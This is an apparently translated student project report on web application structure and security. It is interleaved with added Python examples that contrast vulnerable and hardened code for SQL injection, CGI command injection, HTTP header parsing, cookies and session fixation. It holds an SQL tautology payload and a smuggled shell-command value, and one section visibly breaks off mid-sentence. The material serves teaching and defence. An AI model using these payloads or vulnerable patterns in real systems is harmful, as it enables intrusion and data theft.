Project Report: Web Application Attacks and Security


8/3/2019 Project Report: Web Application Attacks and Security


Project: Web applications and the security problem. Supervisor: Mr. Huỳnh Nguyễn Thành Luân

FOREWORD

In today's era the Internet has become very familiar; it is the main tool with which a country presents its image, or simply a personal web page through which someone introduces themselves. All of this drives the unceasing development of web applications, and gradually the concept of a web application has become commonplace. As web applications become widespread and broadly used on the Internet, attacks on web applications also grow extremely sophisticated. This raises the pressing question of how to guarantee the security of web applications and of their users' information. The technical concepts of web applications and web application attacks are also appearing more often in specialist literature. Tools that help web programmers and network administrators find vulnerabilities in web applications have appeared too, but they cannot keep pace with the dizzying speed at which web applications evolve towards being faster and prettier, and of course they cannot completely prevent attacks on web applications, while the attacks themselves grow more varied and thoroughly exploit the mistakes of the application, of its administrator, or of its programmer.

Statistics are cited showing that 75% of Internet attacks are web application attacks, and they cause enormous damage. Studying web application attacks is therefore essential, and having effective ways to prevent attacks and secure web applications has become an urgent requirement.

Because this is an inevitable trend of the times, studying and researching web applications will be of great help to new web programmers and to new administrators with little experience in managing their network systems, in preventing or fixing the mistakes of web applications. This project is carried out in order to introduce web applications more clearly, to avoid misunderstandings, and at the same time to study the common attacks on web applications so as to have reasonable ways of preventing them and securing web applications.

Student: Nguyễn Văn Đại


Acknowledgements

I would like to thank the Faculty of Information Technology of Công Thương College for creating favourable conditions for me to complete this project.

I thank Mr. Huỳnh Nguyễn Thành Luân and the lecturers of the Faculty of Information Technology for their dedicated guidance, for providing materials and for helping me carry out this project.


Table of Contents

My project consists of the following parts:

Introduction to the project

Chapter 1: General overview of web applications

Chapter 2: Related terms and concepts

Chapter 3: A brief introduction to some basic web application attack techniques

Chapter 4: How to use some common tools

Conclusion and directions for further development of the project


CHAPTER 1: GENERAL OVERVIEW OF WEB APPLICATIONS

1.1 The concept of a web application (website widget or web application)

In more technical terms, a web application queries a content server (mostly a database that stores the content) and generates dynamic web documents to serve the requests of the client (that is, the website user). The documents are generated in a standard format supported by every browser (such as HTML or XHTML). JavaScript is a form of client-side script that allows dynamic elements on each page (such as an image that changes each time the user moves the mouse over it). The web browser is the key: it interprets and runs all the scripts and commands when displaying the page and the requested content.

From a functional point of view, web applications are computer programs that let website users log in, query, enter and retrieve data over the Internet in their favourite web browser. The data is sent to the user's browser as dynamic information (in a specific format, for example CSS-styled HTML) from the web application through a web server.


To fully grasp the meaning of this concept, let us look more closely at the structural model, the functions and the tasks of a web application.

1.2 Structure, functions, interface and basic operating principle of a web application

1.2.1 Basic structure of a web application

The model of a simple web application is the MVC model (Model - View - Controller).

Model layer: contains the code that connects to the database and queries, inserts, deletes and updates data.

View layer: contains the code that builds the interface the user interacts with, i.e. how the data is drawn.

Controller layer: contains the flow-control code that ties the Model and View layers together.

Dividing the application into layers like this increases reuse and makes it easy to extend. For instance, if we want the application to be usable on mobile devices, we only need to create a new view layer for mobile; the model and controller layers do not change. Or if we want to change the database, that is also easier: we only create a new model layer, and the view and controller are not affected.

The model showing the relationship between the three layers in a web application:


Figure 1. Three-layer model of a web application

And here is the model of a web application service:

Figure 2. Simple web application service model

- Presentation layer: communicates with the user; its main task is to display data and to receive data from the user.
- Business Logic layer: its main task is to provide the functions of the software.
- Data layer: stores data and lets the Business Logic layer search, extract and update data.

1.2.2 Interface of a web application


The web interface imposes very few limits on what the user can do. Through Java, JavaScript, DHTML, Flash and other technologies, application-specific methods such as drawing on the screen, playing audio, and using the keyboard and mouse can all be realised. Even everyday techniques such as drag-and-drop are supported by these technologies.

Web developers commonly use client-side scripting languages to add functionality, and especially to create an intuitive, interactive feel without reloading the page (which many users find disruptive). More recently, technologies have been developed that combine client-side scripting with server-side technologies such as PHP. Ajax, a web development technique that uses a combination of several technologies, is one example of a technology that is creating ever more interactive experiences.

1.2.3 Basic functions of web applications

Web applications are popular because a program can be present anywhere. The ability to update and maintain a web application without distributing and installing software on thousands of computers is the main reason for that popularity. Web applications are used to implement webmail, online sales, online auctions, wikis, discussion forums, weblogs, MMORPGs, customer relationship management systems and many other functions.

The web is also a smart sales channel for thousands of organisations and businesses, large and small. With more than a billion Internet users today (source: Computer Industry Almanac 2006), US e-commerce accounted for about 102 billion dollars of transactions in 2006 (source: comScore Networks 2007).

All such data must be packaged, stored, processed and transmitted in some way, for use immediately or at some later date. Web applications for registration, presentation, querying, login, sales and content management are the website widgets that let all of this work be done.

The web is the basic element that helps a business strengthen its online image in the networked world, and build and maintain many long-term profitable relationships with prospective and existing customers.

There is no doubt that web applications have become present everywhere in the world. But because of their highly technical nature and their inherently complex composition, few people know exactly what they are, and in busy daily life they are even seriously misunderstood.

Today's websites are far removed from the static graphics and text of the 1990s and before. Modern web pages let users fetch dynamic content personalised to their own settings and preferences. Moreover, they can run scripts on the client and can turn the Internet browser into the interface for applications such as e-mail and interactive mapping software (Yahoo Mail, Google Maps).

Most importantly, modern websites allow sensitive customer data (such as personal details, credit card numbers and social security information) to be packaged, processed, stored and transmitted for immediate use or for periodic use later. And this is done through web applications. Whether it is a webmail component, a login page, a support and product request form, a purchasing operation or a content management system, modern website development gives businesses the means they need to communicate with future and existing customers.

1.2.4 Basic operating principle of a web application

In the earlier client-server style of computing, each application had its own client program that served as its user interface and had to be installed separately on every user's personal computer. An upgrade to the server part of the application would then require

Step 1: The browser creates an HTTP request and sends it to the web application.

Step 2: The main controller of Struts, the ActionServlet class, catches this request, parses its URL and, based on the struts-config.xml file, forwards the request to the corresponding Action class.

Step 3: The Action class is a class of the Struts Framework. Our application usually extends this class and writes the code that handles the corresponding business logic. For example, we would have a LoginAction that handles user login and logout.

Step 4: The Action class can query and update the database if necessary.

Step 5: When the Action class has finished its business processing, it sends a forward/redirect request, together with data (if any), back to the controller.

Step 6: The controller passes control to the corresponding JSP page, the view layer. If this JSP page uses data, the controller supplies it (this is the data the action produced and handed to the controller).

Step 7: Once the JSP page is ready, the controller creates an HTTP response and sends it back to the browser, which displays it on screen.
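The seven steps above as an added example, written in Python rather than Java and not taken from the report or from the Struts framework: a routing dict stands in for struts-config.xml, the two Action classes and the credential table are my own, and the "JSP" is reduced to a template string. The one thing the example adds to the steps is that the controller HTML-escapes every value it hands to the view, which is where a front controller like this most often goes wrong.

```python
import hmac
import html
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Request:
    """Step 1: what the browser sends (method, URL, decoded form fields)."""
    method: str
    url: str
    form: dict = field(default_factory=dict)


@dataclass
class Forward:
    """Step 5: what an Action hands back to the controller."""
    view: str                           # logical view name, resolved through CONFIG
    data: dict = field(default_factory=dict)
    redirect: bool = False


class Action:
    """Step 3: base class that application actions extend (like Struts' Action)."""
    def execute(self, request: Request) -> Forward:
        raise NotImplementedError


# Constructed sample credential store; stands in for the database of step 4.
USERS = {"alice": "s3cret"}


class LoginAction(Action):
    def execute(self, request: Request) -> Forward:
        user = request.form.get("user", "")
        password = request.form.get("password", "")
        # constant-time comparison; a missing user compares against ""
        if hmac.compare_digest(USERS.get(user, "").encode(), password.encode()):
            return Forward("welcome", {"user": user})
        return Forward("login_failed")


class LogoutAction(Action):
    def execute(self, request: Request) -> Forward:
        return Forward("home", redirect=True)


# Step 2: stands in for struts-config.xml (URL path -> Action, forward name -> view).
CONFIG = {
    "actions": {"/login.do": LoginAction, "/logout.do": LogoutAction},
    "forwards": {
        "welcome": "<h1>Welcome, {user}</h1>",      # a "JSP" reduced to a template
        "login_failed": "<p>Login failed</p>",
        "home": "/index.html",                       # redirect target
    },
}


def action_servlet(request: Request, config=CONFIG):
    """Steps 2, 6 and 7: dispatch on the URL path, render the view, build the response.
    Returns (status, headers, body)."""
    path = urlsplit(request.url).path
    action_cls = config["actions"].get(path)
    if action_cls is None:
        return 404, {}, "Not Found"
    fwd = action_cls().execute(request)
    target = config["forwards"][fwd.view]
    if fwd.redirect:
        return 302, {"Location": target}, ""
    # Step 6: the controller supplies the action's data to the view; every value is
    # HTML-escaped before it is placed in the page.
    body = target.format(**{k: html.escape(str(v)) for k, v in fwd.data.items()})
    return 200, {"Content-Type": "text/html"}, body


if __name__ == "__main__":
    print(action_servlet(Request("POST", "/login.do", {"user": "alice", "password": "s3cret"})))
```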

1.2.5 The security problem of web applications

As web applications develop very fast in every respect and can be applied widely, the security of web applications also receives more attention. Although today's significant improvements cannot be denied, security problems in web applications keep growing. The cause may lie in unsuitable code. Many serious weaknesses or vulnerabilities let hackers break straight in and reach the database to harvest sensitive data. Many databases hold valuable information (such as personal details and financial information), which makes them a frequent target for most hackers. Although attacks that deface business websites still happen regularly, hackers now prefer to gain access to the sensitive data sitting on the database server, because of the huge profits that selling that data brings.

Figure 3. Operating model of a web application

In the operating framework described above, you can see how easy it is for a hacker to reach the information in the database quickly with just a little creativity. With more luck, they may come across a vulnerability born of carelessness or of user error in the web application.

As noted, websites depend on a database to deliver the information users ask for. If the web application is insecure (it has a vulnerability, or falls to some hacking technique), the whole database holding sensitive information is in serious danger.

Some hackers can inject malicious code into a vulnerable web application to deceive users and lead them to a phishing website. This technique is called Cross-site Scripting, and it can be used even when the web server itself and the database host have no vulnerability at all.
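As an added example (not part of the report), the database access that Figure 3 and the paragraphs above describe, written as a Model-layer lookup in Python against an in-memory SQLite table with constructed rows: first the pattern that turns the web application into an open gateway to the database, then the parameterised form that closes it. The table, column names and the tautology string are my own.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the kind of 'valuable information' the text says
    makes databases a target. Not real card numbers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, card_no TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)",
                     [("alice", "4111-1111"), ("bob", "5500-0000")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the SQL by string concatenation: the request parameter becomes
    SQL syntax, so the caller's WHERE clause is whatever the attacker wants."""
    sql = "SELECT username, card_no FROM customers WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the value is bound by the driver and is never parsed
    as SQL, so the same input is just a user name that does not exist."""
    sql = "SELECT username, card_no FROM customers WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Classic tautology: closes the quoted literal and appends an always-true clause.
ATTACK = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, ATTACK))   # every row leaks
    print("hardened:  ", lookup_hardened(db, ATTACK))     # []
```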


A recent study shows that 75% of network attacks are carried out at the web application level. Websites and their related web applications must be available 24/7 to provide service on demand to customers, employees, suppliers and many other parties. Firewalls and SSL cannot protect a web application against every hacking activity, simply because access to the website has to be public: anyone can visit it. All modern database systems (such as Microsoft SQL Server, Oracle and MySQL) can be reached through the web application, which listens on ports that must stay open (such as ports 80 and 443). Through that path someone can effectively reach the database directly, bypassing the security mechanisms of the operating system. These ports are kept open to let legitimate network traffic through, and so they also form a large and dangerous hole.

Web applications routinely access back-end data such as customer databases and handle valuable data, and are therefore very hard to make absolutely safe. Data access here usually goes through scripts that package and transmit the data. If a hacker spots a weakness in a script, he can easily divert the flow elsewhere and illegally expose users' personal details, sometimes without even intending to.

Most web applications are home-grown, so they get far less testing than packaged software of the same kind, and custom applications are therefore usually easier to attack. A web application can be called the gateway to the database, especially a custom one: such applications are not developed to the best security standard and do not go through the usual security tests. In general you need to answer the questions "Which part of our website do we think is secure but in fact opens the door to attacks?" and "What data can we feed into an application to make it do something it should not?" That is the job of web vulnerability scanning software.

Today hackers have many ways to attack a web application, from basic techniques to those demanding high skill and technology. More and more supporting tools are appearing; they help network administrators a great deal in finding basic vulnerabilities and patching them in time, but they are also a double-edged sword. Hackers can use the same tools to discover the vulnerabilities of a web application and will then have a matching attack for each one, causing a great deal of damage. Studying attack techniques and today's basic tools is therefore an essential part of web application security research.


CHAPTER 2: RELATED TERMS AND CONCEPTS

2.1 Common concepts and terms

2.1.1 General concepts of web applications

A web browser is a software application that lets users query data and interact with the content of the web pages within a website.

Static web pages: the user requests some resource and the server returns that resource. The pages are nothing more than formatted, distributed text. For browsers, static pages pose no difficulty: at first the web only carried information about events, addresses or schedules over the Internet, with no interaction through the pages.

"Dynamic" web is the term for websites backed by web-based software, more precisely a program that works with the HTTP protocol. In essence, a dynamic website is a static website "combined" with web software (application modules for the web). With this software the website owner really does operate it, editing and updating the information on their own website without relying on professionals.

A domain name is the identifier of a website on the Internet. It is usually tied to the company name and brand of the business. A domain name is unique and is allocated to whichever party registers it first.


+ There are two kinds of domain name:

- International domains of the form www.tencongty.com (.net, .biz, .org, .info, ...)

- National domains of the form www.tencongty.com.vn (or .net.vn, .biz.vn, .org.vn, .gov.vn, ...)

- Web hosting is space on a server with Internet services such as FTP and WWW installed, where you can keep the content of your website or other data. The reason you have to rent web hosting to hold your website content and your mail and FTP services is that those machines always have a fixed address when connected to the Internet (an IP address), whereas if you access the Internet in the usual way today through an ISP (Internet Service Provider), the IP address of your machine keeps changing, so data on your machine cannot be reached from other machines on the Internet.

2.1.2 Terms, concepts and tools related to web applications

CGI: The first solution for making dynamic web pages was the Common Gateway Interface (CGI). CGI lets programs run when the user sends a request. Suppose we need to display the items for sale on a website: with a CGI script we can access the product database and display the result. Using simple HTML forms and CGI scripts, one can build virtual shops that sell products to customers through a browser. CGI scripts can be written in a number of languages, from Perl to Visual Basic.

However, CGI is not a safe way to build dynamic web pages. With CGI, other people can run programs on the system, and so can run unwanted programs that damage the system. Even so, CGI is still in use today.
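An added example, not from the report, of what "other people can run programs on the system" looks like in practice: a CGI-style handler written in Python that shells out with a query parameter, next to the same feature fixed in two steps (argv instead of a shell string, then an allow-list on the value). The parameter name, the greeting command and the allow-list pattern are my own assumptions; `echo` is used so the example runs anywhere with /bin/sh.

```python
import os
import re
import subprocess
from urllib.parse import parse_qs

# Allow-list for the one parameter this script accepts (an assumption for the example).
NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{0,31}")


def greet_vulnerable(name: str) -> str:
    """The unsafe pattern: the query parameter is pasted into a shell command line.
    A value such as 'alice; echo INJECTED' is two commands to /bin/sh, and the
    second one runs with the web server's privileges."""
    cmd = "echo Hello " + name
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def greet_argv_only(name: str) -> str:
    """Half the fix: pass an argv list so no shell ever parses the value.
    The metacharacters are now just characters inside one argument."""
    return subprocess.run(["echo", "Hello", name], capture_output=True, text=True).stdout


def greet_hardened(name: str) -> str:
    """The full fix: allow-list the value first, then use argv."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("rejected name: %r" % name)
    return greet_argv_only(name)


def is_rejected(name: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        greet_hardened(name)
    except ValueError:
        return True
    return False


def cgi_main() -> None:
    """CGI entry point: the web server passes the query string in the environment."""
    params = parse_qs(os.environ.get("QUERY_STRING", ""))
    name = params.get("name", [""])[0]
    print("Content-Type: text/plain\r\n\r\n", end="")
    try:
        print(greet_hardened(name), end="")
    except ValueError:
        print("Bad Request")


if __name__ == "__main__":
    cgi_main()
```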

Applet: In May 1995, John Gage of Sun and Andreessen (now of Netscape Communications Corporation) announced a new programming language called Java. Netscape Navigator supported the new language, a new road for dynamic web pages was opened, and the era of the applet began.

Applets let developers write small applications embedded in web pages. With a browser that supports Java, users can run the applets in the browser on the Java Virtual Machine (JVM). Although applets can do a lot, they also have drawbacks: they are usually blocked from reading and writing system files, cannot load libraries, and sometimes cannot execute on the client at all. In return for these restrictions, applets run under a sandbox security model that protects the user from dangerous code. There were times when applets were used heavily, but problems arose as well: the dependence on the JVM, the fact that an applet only runs when a suitable environment is installed on the client, and the relatively slow speed of applets. Applets are therefore not the optimal solution for the dynamic web.

JavaScript: Around the same time, Netscape created a scripting language called JavaScript. JavaScript was designed to make development easier for web designers and for programmers not fluent in Java. (Microsoft also has a scripting language called VBScript.) JavaScript immediately became an effective method for creating dynamic web pages.

Treating a page as an object gave rise to a new concept called the Document Object Model (DOM). At first JavaScript and the DOM were tightly coupled, but later they were separated. The DOM is purely an object-oriented representation of a web page, and it can be modified with any scripting language such as JavaScript or VBScript.

The World Wide Web Consortium (W3C) standardised the DOM, while the European Computer Manufacturers Association (ECMA) approved JavaScript as the ECMAScript specification.

JSP/Servlet, ASP and PHP: Along with Java, Sun also introduced a new technology called the servlet. The Java code does not run on the client as with applets; it runs inside an application on the server side. Servlets also serve the same purpose as CGI scripts. The servlet was a step forward: it provides a Java API and a complete library for working with the HTTP protocol.

JavaServer Pages (JSP) is Sun's web programming technology; alongside it stands another technology, from Microsoft: Active Server Pages (ASP). JSP requires a server that understands Java. Microsoft studied the weaknesses of servlets and created ASP to make designing dynamic web pages easier, adding very powerful toolkits and seamless integration with its web servers. JSP and ASP are alike in that both are designed to separate processing from presentation. There are technical differences, but both let web designers concentrate on layout while software developers concentrate on the programming logic.

Flash: In 1996 FutureWave released the product FutureSplash Animator. FutureWave was later acquired by Macromedia, which released the product Flash. Flash lets designers create animated and dynamic applications; it does not demand advanced programming skills and is easy to learn. Like many other solutions, Flash requires client-side software, for example the Shockwave Player plug-in, which may be bundled with some operating systems or browsers.

DHTML: When Microsoft and Netscape released version 4 of their browsers, web developers gained a new option: Dynamic HTML (DHTML). DHTML is not a W3C standard; it is more like a commercial toolkit. In practice it is a combination of HTML, Cascading Style Sheets (CSS), JavaScript and the DOM. Together these technologies let developers change the content and structure of a web page quickly. However, DHTML needs browser support, and although both Internet Explorer and Netscape support it, their implementations differ, so developers have to know which browser the client is using. DHTML is a genuine step forward, but it still needs development standards. Today DHTML is still developing strongly.

XML: Since its introduction in the mid-1990s, the W3C's eXtensible Markup Language (XML), a derivative of SGML, has become very popular. XML is everywhere; Microsoft Office 12 will also support the XML file format. Today there are many XML derivatives for web applications (including, of course, XHTML): XUL from Mozilla; XAMJ, an open-source Java-based product; MXML from Macromedia; and XAML from Microsoft.

2.1.3 Concepts and terms related to web application attacks and security

2.1.3.1 The concept of a hacker

The concept of a hacker dates from the 1950s and 1960s, and after a fairly long period of development hackers are today divided into 4 kinds:

- White-hat hackers: programming experts who look for bugs in software in order to fix them and build safer systems.

- Black-hat hackers: the opposite of white hats; hackers who cause damage and profit for themselves.

- Blue-hat hackers / samurai: talented programming experts hired by firms such as Microsoft to find bugs in their software.

- Grey-hat or brown-hat hackers: people who sometimes do the work of a white hat but still do the work of a black hat.

Whatever kind they call themselves, they are all breaking into systems through security vulnerabilities. I will therefore use the term hacker for anyone who attacks web applications.

2.1.3.2 HTTP HEADER

The HTTP header is the leading part of an HTTP message that carries the operating parameters of an exchange between server and client. The information the client sends to the server is called an HTTP request; the information the server returns to the client is called an HTTP response. The header fields define the various characteristics of the data transfer being requested, or of the data supplied in the message. HTTP headers can take many forms; a header line starts with the field name, terminated by a colon, followed by the field value. Field names and values can be any application-specific string, but the core set of fields is standardised by the Internet Engineering Task Force. Some parameters are used by both the client and the server.

- (A table listing the parameters is given at the end of the project.)
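An added example, not from the report, of a parser for the format just described (request line, then one "name: value" field per line, a blank line, then the body), in Python. It also applies the checks a server-side filter would want: field names restricted to token characters, no bare CR/LF inside a value, and rejection of the two Content-Length / Transfer-Encoding combinations that let a front-end and a back-end disagree about where one request ends. The sample request bytes are constructed for the example.

```python
import re

# Constructed sample request (not captured from any real system).
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 26\r\n"
    b"Cookie: SESSIONID=abc123\r\n"
    b"\r\n"
    b"user=alice&password=s3cret"
)

# RFC 7230 "token" characters: the only characters a field name may contain.
TOKEN = re.compile(r"[!#$%&'*+.^_`|~0-9A-Za-z-]+")


class BadRequest(ValueError):
    pass


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.1 request into request line, header fields and body.
    Field names are case-insensitive, so they are stored lower-cased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise BadRequest("no blank line terminating the headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise BadRequest("malformed request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not TOKEN.fullmatch(name):      # "Name :" and "" are rejected
            raise BadRequest("malformed header line: %r" % line)
        value = value.strip(" \t")
        if "\r" in value or "\n" in value:              # bare CR/LF smuggled into a value
            raise BadRequest("control character in header value")
        key = name.lower()
        if key not in headers:
            headers[key] = value
        elif key == "content-length":
            if headers[key] != value:                   # two different lengths: desync bait
                raise BadRequest("conflicting Content-Length values")
        else:
            headers[key] += ", " + value                # repeated fields combine as a list
    if "content-length" in headers and "transfer-encoding" in headers:
        raise BadRequest("Content-Length and Transfer-Encoding both present")
    if "content-length" in headers:
        if not headers["content-length"].isdigit():
            raise BadRequest("non-numeric Content-Length")
        length = int(headers["content-length"])
        if len(body) < length:
            raise BadRequest("body shorter than Content-Length")
        body = body[:length]
    return {"method": parts[0], "target": parts[1], "version": parts[2],
            "headers": headers, "body": body}


def is_bad_request(raw: bytes) -> bool:
    """True when parse_request rejects the bytes."""
    try:
        parse_request(raw)
    except BadRequest:
        return True
    return False


if __name__ == "__main__":
    print(parse_request(SAMPLE_REQUEST))
```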

2.1.3.3 SESSION

HTTP is a stateless protocol: it does not keep the working state between server and client. This makes some web applications hard to manage, because the server does not know what state the client was in before. To solve this problem, the concept of a SESSION (working session) was added on top of HTTP. A session ID is a string that identifies and authenticates a session. Some servers allocate a session to the user when they view a page on the server.

- To maintain the session, the session ID is usually stored in:

+ a URL variable

+ a hidden form field

+ a cookie

- A session only exists for an allowed period of time; this period is set on the server or by the running application. The server releases the session automatically to recover system resources.


2.1.3.4 COOKIE

A cookie is a small piece of structured data shared between the server and the user's browser.

Cookies are stored as small text files, created by the application to store, track and recognise the users who visit the website and the areas of the site they pass through. This information may include user details, account names and passwords. The cookie is accepted by the user's browser and saved on the user's hard disk. Many browsers do not store cookies automatically but leave it to the user to decide whether to accept them.

On later visits to the same website, the application can reuse the information in the cookie (the related account details) without the user having to log in or supply any further information.

Cookies can be classified in several ways. Classified by who sets them, there are 2 kinds: first-party cookies are set by the domain of the website shown in the address bar; third-party cookies come from other domains whose items, such as advertisements or images, are embedded in the page. Another classification splits cookies into 4 kinds by combining secure/non-secure with persistent/non-persistent:

- Persistent and Secure

- Persistent and Non-Secure

- Non-Persistent and Secure

- Non-Persistent and Non-Secure

Persistent cookies are stored as .txt files (for example Netscape Navigator saves all cookies into one cookies.txt file, while Internet Explorer saves many *.txt files, each file holding one cookie) on the client for a fixed period of time.


Non-persistent cookies are held in the client's RAM and are destroyed when the browser is closed or when the website sends a command to delete them.

Secure cookies can only be sent over HTTPS (SSL).

Non-secure cookies can be sent over either HTTPS or HTTP.

In essence, for a secure cookie the server provides a protected transmission channel.

The components of a cookie are:

1. Domain: the domain name of the website that created the cookie (in the example above).

2. Flag: TRUE/FALSE - determines whether other machines within the same domain may access the cookie.

3. Path: the range of addresses that may access the cookie. For example, if the path is /tracuu then the addresses in the /tracuu directory and all its subdirectories, such as /tracuu/baomat, may access the cookie. If the value is / then every address in the domain of the website that created the cookie may access it.

4. Secure: TRUE/FALSE - determines whether this is a secure cookie, i.e. whether the connection must use SSL.

5. Expiration: the expiry time of the cookie, counted in seconds since 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats it as a non-persistent cookie, keeps it only in RAM and deletes it when the browser is closed.

6. Name: the variable name (in this case Apache).

7. Value: for the cookie created above, the value of Apache is 64.3.40.151.16018996349247480, its expiry date is 27/07/2006 and its domain is http://www.redhat.com.

- Netscape (NS) cookies are kept in a single file, Cookies.txt, at the path C:\Program Files\Netscape\Users\UserName\Cookies.txt

- Internet Explorer cookies are saved as many files, one cookie per file, in [C:]\Documents and Settings\[username]\Cookies (Windows 2000); on Windows 9x the cookies directory is [C:]\Windows\cookies.

- The maximum size of a cookie is 4 KB. The maximum number of cookies for one domain is 20.

A cookie that is destroyed as soon as the browser is closed is called a session cookie.

You should know about and configure cookies, because cookies can let websites track your navigation while you visit them.
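An added example, not from the report, that turns the attribute list above into code in Python: a parser for a Set-Cookie header value (Domain, Path, Secure, Expires, Max-Age, the 4 KB limit) and the decision a browser makes about whether to attach the stored cookie to a later request. The sample cookie and host names are constructed for this example; they are not the redhat.com cookie from the page.

```python
from dataclasses import dataclass
from email.utils import parsedate_to_datetime
from typing import Optional
from urllib.parse import urlsplit

MAX_COOKIE_BYTES = 4096          # the 4 KB limit mentioned in the text

# Constructed sample header (the names are my own).
SAMPLE_SET_COOKIE = ("SESSIONID=abc123; Domain=.example.com; Path=/tracuu; Secure; "
                     "Expires=Thu, 27 Jul 2006 00:00:00 GMT")


@dataclass
class Cookie:
    name: str
    value: str
    domain: str                        # host that may receive it, and its subdomains
    path: str = "/"
    secure: bool = False
    expires: Optional[float] = None    # seconds since 1970-01-01 00:00:00 GMT; None = session cookie


def parse_set_cookie(header: str, request_host: str, now: float = 0.0) -> Cookie:
    """Parse a Set-Cookie value into the attributes described above. Unknown
    attributes are ignored; a missing Domain defaults to the responding host."""
    if len(header.encode("utf-8")) > MAX_COOKIE_BYTES:
        raise ValueError("cookie exceeds 4 KB")
    parts = [p.strip() for p in header.split(";")]
    name, eq, value = parts[0].partition("=")
    if not eq or not name.strip():
        raise ValueError("cookie needs name=value")
    cookie = Cookie(name.strip(), value.strip(), domain=request_host.lower())
    max_age = None
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain" and val:
            cookie.domain = val.lstrip(".").lower()
        elif key == "path" and val.startswith("/"):
            cookie.path = val
        elif key == "secure":
            cookie.secure = True
        elif key == "expires":
            try:
                cookie.expires = parsedate_to_datetime(val).timestamp()
            except (ValueError, TypeError):
                pass                                   # unparsable date: treated as absent
        elif key == "max-age" and val.lstrip("-").isdigit():
            max_age = int(val)
    if max_age is not None:
        cookie.expires = now + max_age                 # Max-Age takes precedence over Expires
    return cookie


def should_send(cookie: Cookie, url: str, now: float) -> bool:
    """Would a browser attach this cookie to a request for `url` at time `now`?"""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if cookie.expires is not None and now >= cookie.expires:
        return False                                   # expired: the browser has discarded it
    if cookie.secure and u.scheme != "https":
        return False                                   # Secure cookies travel only over HTTPS
    if host != cookie.domain and not host.endswith("." + cookie.domain):
        return False                                   # domain match: the host or a subdomain
    path = u.path or "/"
    return path == cookie.path or path.startswith(cookie.path.rstrip("/") + "/")


if __name__ == "__main__":
    c = parse_set_cookie(SAMPLE_SET_COOKIE, "www.example.com")
    print(c, should_send(c, "https://www.example.com/tracuu/baomat", 1153872000.0))
```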

2.1.3.5 PROXY

A proxy gives users Internet access for a specific protocol, or a set of protocols, running on a dual-homed host or bastion host. The user's client programs go through the intermediate proxy server instead of the real server the user wants to talk to.

The proxy server examines the requests coming from the client and decides whether or not to serve them. If a request is served, the proxy server connects to the real server on behalf of the client and keeps forwarding the client's requests to the server, as well as the server's replies back to the client. The proxy server is thus an intermediate bridge between server and client.


    CHAPTER 3: BASIC WEB APPLICATION ATTACK TECHNIQUES

    A. Theory

    1. WEB ACCESS CONTROL

    Entering the system through a back door

    While designing an application, its developers may plant a back door so that they can later get into the system easily.

    2. TAKING OVER THE SESSION (Session Management)

    1.1 Session Fixation

    An attack technique that lets the hacker impersonate a legitimate user by sending the user a valid session ID; once the user has logged in to the system successfully, the hacker reuses that session ID and thereby becomes the legitimate user.

    2.2 Session Hijacking

    An attack technique that lets the hacker impersonate a legitimate user after the victim has logged in to the system, by working out the victim's session ID stored in a cookie, a URL parameter or a hidden form field.
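    The defence against session fixation is that a login must never keep the session ID the request arrived with. The following is an added example, not code from the thesis: a minimal in-memory session store with the fixable login pattern beside the one that issues a fresh server-generated ID on authentication. All names (SessionStore, login_fixable, login_regenerating) are ours, and the credential check is a constructed stand-in.

```python
# Added example (not from the thesis): a minimal in-memory session store
# showing the countermeasure to session fixation, namely issuing a fresh,
# server-generated session ID on successful login instead of keeping the ID
# the request carried. All names (SessionStore, login_*) are ours, and the
# credential check is a constructed stand-in.
import secrets
from typing import Dict, Optional


class SessionStore:
    def __init__(self) -> None:
        self._sessions: Dict[str, Optional[str]] = {}  # sid -> username, or None before login

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unguessable
        self._sessions[sid] = None
        return sid

    def bind(self, sid: str, username: str) -> None:
        self._sessions[sid] = username

    def drop(self, sid: str) -> None:
        self._sessions.pop(sid, None)

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)


def check_password(username: str, password: str) -> bool:
    # Constructed credential check standing in for the real one.
    return (username, password) == ("alice", "correct horse")


def login_fixable(store: SessionStore, presented_sid: str,
                  username: str, password: str) -> Optional[str]:
    """Vulnerable pattern: whatever session ID the request carries, even one
    the server never issued, is kept and bound to the authenticated user. An
    ID handed to the victim beforehand therefore becomes a logged-in session
    for anyone who knows it."""
    if not check_password(username, password):
        return None
    store.bind(presented_sid, username)
    return presented_sid


def login_regenerating(store: SessionStore, presented_sid: str,
                       username: str, password: str) -> Optional[str]:
    """Hardened pattern: on successful authentication discard the presented
    ID and issue a new one; the old value never becomes authenticated."""
    if not check_password(username, password):
        return None
    store.drop(presented_sid)
    new_sid = store.new_session()
    store.bind(new_sid, username)
    return new_sid
```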

    3 EXPLOITING GAPS IN INPUT VALIDATION

    The hacker uses the data-entry fields to send an arbitrary piece of code that makes the system execute it or crash entirely.

    3.1 Validating data with browser-side languages (Client-Side validation)

    Because browser-side languages (JavaScript, VBScript, ...) run in the browser, the hacker can modify the source to disable the check.

